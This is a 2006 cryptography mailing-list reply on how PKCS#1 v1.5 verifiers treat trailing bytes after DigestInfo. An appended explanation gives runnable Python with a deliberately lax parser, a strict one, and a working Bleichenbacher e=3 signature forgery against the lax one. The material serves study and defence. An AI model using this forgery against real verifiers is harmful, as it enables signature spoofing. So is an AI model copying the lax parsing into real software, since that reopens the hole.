Exponent 3 damage spreads...

Peter Gutmann pgut001 at cs.auckland.ac.nz
Thu Sep 21 12:28:14 EDT 2006


"Kuehn, Ulrich" <Ulrich.Kuehn at telekom.de> writes:

>       10.2.3 Data decoding
>
>       The data D shall be BER-decoded to give an ASN.1 value of
>       type DigestInfo, which shall be separated into a message
>       digest MD and a message-digest algorithm identifier. The
>       message-digest algorithm identifier shall determine the
>       "selected" message-digest algorithm for the next step.
>
>Here, any trailing garbage would be included in data D. But does an ASN.1
>value allow such a thing? I am asking this independently of our discussion
>here.

I don't think it's a problem: you just take the ASN.1 DigestInfo value, and since
the trailing garbage isn't part of the DigestInfo, you ignore it.
Specifically, the ASN.1 object is entirely self-contained, so you can tell
exactly where it ends and what it contains.  Anything outside it is beyond the
scope of this specification :-).

(When the spec was written, I think the thought that someone would append
trailing garbage never cropped up, so it's never explicitly addressed).

>Anyway, I think we agree on the point that the spec (even version 2.1) is at
>some points imprecise, which should be considered a bug, as it can lead to
>implementation flaws. And yes, given what we know, e=3 is a good candidate
>for elimination :)

Yup :-).

Peter.


---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo at metzdowd.com
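The practical point behind this exchange is how a verifier treats bytes after the self-delimiting DigestInfo. PKCS #1 v1.5 says the encoded message is 00 || 01 || PS (at least eight 0xFF bytes) || 00 || T, with T the DER DigestInfo; a verifier that locates T by its DER length and stops there ("lax") will accept a block with arbitrary trailing garbage, and with e = 3 an attacker can choose that garbage so the whole block is a perfect cube, which is the Bleichenbacher forgery that started this thread. The following is an added example, not code from the list posting or from any of the implementations discussed: a lax and a strict parser for the padding, and the e = 3 forgery that the lax one accepts. The 2048-bit value `N_STANDIN` is a constructed stand-in, not a real RSA modulus; the forgery never reduces modulo n, so the result does not depend on n's factorization.

```python
"""Strict vs. lax parsing of PKCS#1 v1.5 signature padding, and the e = 3 forgery
that a lax parser accepts.  EM = 00 || 01 || PS (>= 8 bytes of FF) || 00 || T,
where T is the DER-encoded DigestInfo (RFC 3447 section 9.2)."""
import hashlib

E = 3
# Constructed stand-in for a 2048-bit modulus (top bit set, odd).  The forgery never
# wraps modulo n (s**3 < n), so nothing below depends on n being a real RSA modulus.
N_STANDIN = (1 << 2047) | (0xC0FFEE << 64) | 1

# DER encoding of DigestInfo{SHA-1} minus the 20 hash bytes (RFC 3447 section 9.2, note 1).
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")


def digest_info_sha1(msg: bytes) -> bytes:
    return SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()


def der_object_len(buf: bytes, off: int) -> int:
    """Total size (tag + length + contents) of the DER object starting at buf[off].
    DER is self-delimiting, so this tells us exactly where T ends."""
    if off + 2 > len(buf):
        raise ValueError("truncated DER header")
    first = buf[off + 1]
    if first < 0x80:                      # short form
        return 2 + first
    nbytes = first & 0x7F                 # long form: number of length octets
    if nbytes == 0 or nbytes > 4 or off + 2 + nbytes > len(buf):
        raise ValueError("bad DER length")
    return 2 + nbytes + int.from_bytes(buf[off + 2:off + 2 + nbytes], "big")


def parse_em(em: bytes, strict: bool) -> bytes:
    """Return T from EM.  strict=True additionally requires >= 8 bytes of PS and
    that T ends exactly at the end of EM (no trailing bytes)."""
    if len(em) < 11 or em[0] != 0x00 or em[1] != 0x01:
        raise ValueError("bad leading bytes")
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i >= len(em) or em[i] != 0x00:
        raise ValueError("PS not terminated by 00")
    if strict and i - 2 < 8:
        raise ValueError("PS shorter than 8 bytes")
    t_start = i + 1
    t_end = t_start + der_object_len(em, t_start)
    if t_end > len(em):
        raise ValueError("DigestInfo runs past the end of EM")
    if strict and t_end != len(em):
        raise ValueError("trailing bytes after DigestInfo")
    return em[t_start:t_end]


def verify(sig: int, n: int, e: int, msg: bytes, strict: bool) -> bool:
    k = (n.bit_length() + 7) // 8
    em = pow(sig, e, n).to_bytes(k, "big")
    try:
        return parse_em(em, strict) == digest_info_sha1(msg)
    except ValueError:
        return False


def icbrt_ceil(x: int) -> int:
    """Smallest integer s with s**3 >= x (binary search, no floating point)."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge_e3(n: int, msg: bytes) -> int:
    """Bleichenbacher-style forgery: choose the garbage so EM is a perfect cube."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info_sha1(msg)
    garbage_bits = 8 * (k - len(prefix))
    target = int.from_bytes(prefix, "big") << garbage_bits
    s = icbrt_ceil(target)
    # s**3 overshoots target by less than 3*s**2 + 3*s + 1; for k = 256 and SHA-1 that
    # is under 2**1364, well inside the 1680 garbage bits, so the prefix and the
    # DigestInfo survive intact and a lax parser never sees the difference.
    assert target <= s ** 3 < target + (1 << garbage_bits) and s ** 3 < n
    return s


def demo(msg: bytes = b"message the key holder never signed") -> tuple:
    """(lax verifier accepts forgery, strict verifier accepts forgery)."""
    s = forge_e3(N_STANDIN, msg)
    return verify(s, N_STANDIN, E, msg, strict=False), verify(s, N_STANDIN, E, msg, strict=True)


if __name__ == "__main__":
    print("lax accepts, strict accepts:", demo())
```

Running `demo()` gives `(True, False)`: the lax parser, which does exactly what the reply above describes (take the DER object, ignore what follows), accepts the forged value, while the strict parser rejects it because T does not end at the end of EM. The check that closes the hole is a single length comparison, which is why the discussion treats the spec's silence about trailing bytes as the bug, and why the forgery needs a small public exponent: with e = 65537 the attacker cannot take a root of the constructed block.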